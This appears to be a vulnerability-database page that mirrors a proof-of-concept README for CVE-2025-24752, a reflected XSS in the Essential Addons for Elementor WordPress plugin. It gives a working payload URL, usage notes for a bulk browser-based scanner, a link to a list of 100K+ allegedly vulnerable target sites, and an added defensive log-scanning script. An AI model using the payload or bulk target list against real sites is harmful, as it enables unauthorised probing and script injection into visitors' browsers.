Related vulnerabilities
Description
Hi, I am Chirag Artani. This is the POC of Reflected XSS in Essential Addons for Elementor Affecting 2+ Million Sites - CVE-2025-24752
Introduction
Please do not harm sites, FIX it ASAP
targets vulnerable 100K+ probably affecting for XSS https://nt.ls/AkTE9 (can download by one click all vulnerable)
##### Requirement to run poc.py, Install -
```pip install selenium webdriver-manager```
##### Usage
```python poc.py targets.txt```
For bulk runs it will take time, but yes, it is going to confirm the XSS. It works like a browser, so it waits until the XSS pop-up appears to see and confirm it.

#### manual POC elementor XSS 2025
==> ```https://target.com/?popup-selector=<img_src=x_onerror=alert("chirag")>&eael-lostpassword=1```

Note: My script works slowly, but it can 1000% confirm the XSS bug, unlike nuclei or httpx. I tried all the things; versions below 6.0.15 are affected.
#### Information & reference
https://patchstack.com/articles/reflected-xss-patched-in-essential-addons-for-elementor-affecting-2-million-sites/
The Essential Addons for Elementor plugin suffered from a reflected cross-site scripting (XSS) vulnerability. The vulnerability occurred due to insufficient validation and sanitizing of the popup-selector query argument, allowing for a malicious value to be reflected back at the user. The vulnerability is fixed in version 6.0.15 and has been tracked with CVE-2025-24752.
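For defenders, the following is an added example (not part of the original README or of poc.py) that flags web-server access-log requests whose `popup-selector` value is not a plain CSS selector, and checks whether an installed plugin version is below the fixed release 6.0.15. The allowlist pattern, the combined log format, the function names and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate popup-selector is a plain CSS id/class selector.
SAFE_SELECTOR = re.compile(r"^[#.]?[A-Za-z0-9_-]+(?:\s+[#.]?[A-Za-z0-9_-]+)*$")
FIXED_VERSION = (6, 0, 15)  # fixed release stated on this page

# Request field of a combined-format access log: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def is_affected(version: str) -> bool:
    """True when a plugin version string is below the fixed release."""
    parts = tuple(int(p) for p in version.split(".")[:3])
    parts += (0,) * (3 - len(parts))  # pad "6.1" to (6, 1, 0)
    return parts < FIXED_VERSION


def suspicious_selector(target: str):
    """Return the decoded popup-selector value if it is not a plain selector."""
    params = parse_qs(urlsplit(target).query)  # parse_qs URL-decodes values
    for value in params.get("popup-selector", []):
        if not SAFE_SELECTOR.match(value):
            return value
    return None


def scan(lines):
    """Yield (line_number, decoded_value) for each flagged log line."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            value = suspicious_selector(match.group(1))
            if value is not None:
                yield number, value


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Feb/2025:10:00:01 +0000] "GET /?popup-selector=%23eael-popup&eael-lostpassword=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Feb/2025:10:00:05 +0000] "GET /?popup-selector=%3Cimg%20src%3Dx%3E&eael-lostpassword=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Feb/2025:10:00:09 +0000] "GET /wp-login.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-selector popup-selector value {value!r}")
```

A hit in the logs shows that markup was sent in the parameter, not that it executed; whether it was reflected depends on the installed plugin version, which `is_affected` checks.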
File snapshot
[4.0K] /data/pocs/7c40ea5190254c4ad71427b745589bc0cb4271b4
├── [6.0K] poc.py
└── [1.4K] README.md
0 directories, 2 files